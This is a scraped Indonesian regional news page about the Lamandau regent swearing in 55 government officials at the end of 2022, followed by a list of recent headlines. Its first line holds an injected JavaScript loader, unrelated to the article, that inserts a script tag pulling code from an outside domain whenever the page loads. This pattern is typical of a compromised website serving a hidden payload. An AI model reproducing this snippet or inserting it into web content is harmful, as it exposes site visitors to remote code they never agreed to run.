(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Lamandau

Penutup Tahun, Bupati Lamandau Melantik 55 Pejabat


KANALKALIMANTAN.COM, NANGA BULIK –Di pengujung tahun 2022 digelar pelantikan dan pengambilan sumpah janji jabatan pejabat pimpinan tinggi pratama, administrator, dan pengawas di lingkungan Pemerintah Kabupaten (Pemkab) Lamandau.

Acara pelantikan dan pengambilan sumpah berlangsung di Gedung Pertemuan Umum, Lantang Torang, Kabupaten Lamandau, Kalimantan Tengah, Jum’at (30/12/2022) malam, dipimpin Bupati Lamandau H Hendra Lesmana, didampingi Ketua DPRD Lamandau Herianto Ssos, Sekda Kabupaten Lamandau M Irwansyah.

Pelantikan pejabat di lingkungan Pemkab Lamandau ini diikuti 55 orang berlangsung lancar dan khidmat.

Bupati Hendra mengatakan bahwa sejak tahun 2020, 2021 dan 2022, pelantikan pejabat selalu dilaksanakan pada akhir tahun.

 

 

Baca juga: Kabupaten Banjar Terus Bangkit Menuju Daerah yang Maju, Mandiri dan Agamis

“Hal ini dilakukan sebagai bentuk apresiasi dan evaluasi saya selaku pejabat pembina kepegawaian terhadap kinerja pegawai negeri sipil dengan instrumen penilaian yang objektif,” ungkapnya.

Diharapkan, pada awal tahun 2023, pejabat yang pada kesempatan ini dilantik dan mendapatkan penugasan dapat mulai melaksanakan tugas jabatan dengan penuh motivasi dan gairah kerja yang baru.

“Kepada seluruh pejabat yang dilantik, saya berharap saudara berkomitmen dengan sumpah dan janji jabatan yang baru saja diucapkan untuk pencapaian visi dan misi yang telah dijabarkan, dalam Rencana Pembangunan Jangka Menengah Daerah (RPJMD) Kabupaten Lamandau tahun 2018-2023,” tegasnya.

“Tahun 2023, kata dia lagi, merupakan tahun terakhir periode kepemimpinan saya sebagai kepala daerah, Saya ingin seluruh target indikator kinerja sasaran pemerintah daerah dapat tercapai,” sambungnya.

Baca juga: Ini Sejarah Asal Muasal Perayaan Tahun Baru

Bupati Hendra memberikan penekanan kepada para pejabat yang baru dilantik agar benar-benar dapat menjalankan tugas dan tanggung jawab secara profesional, demi terwujudnya Kabupaten Lamandau JUARA (Jujur Unggul Adil Religius dan Aman).

“Selamat bekerja, tunaikan amanat dan jaga kepercayaan ini dengan sebaik-baiknya. Sekali lagi, saya akan memperhatikan dan mengevaluasi kinerja saudara. Saya akan ambil keputusan walaupun pahit dan konsekuensi terhadap politik saya selaku Bupati,” pungkasnya.(Kanalkalimantan.com/habibullah)

Reporter : habibullah
Editor : kk


Risa

Recent Posts

Soal Pungutan Acara Perpisahan Siswa, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dewan Perwakilan Rakyat Daerah (DPRD) Kota Banjarbaru menyikapi persoalan iuran kegiatan acara… Read More

3 jam ago

Pungutan Acara Perpisahaan Siswa, Begini Respon Wali Kota Aditya

KANALKALIMANTAN.COM, BANJARBARU – Menyikapi pungutan acara perpisahan siswa sekolah di Banjarbaru, Wali Kota Banjarbaru Aditya… Read More

4 jam ago

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

15 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

15 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

15 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

16 jam ago

This website uses cookies.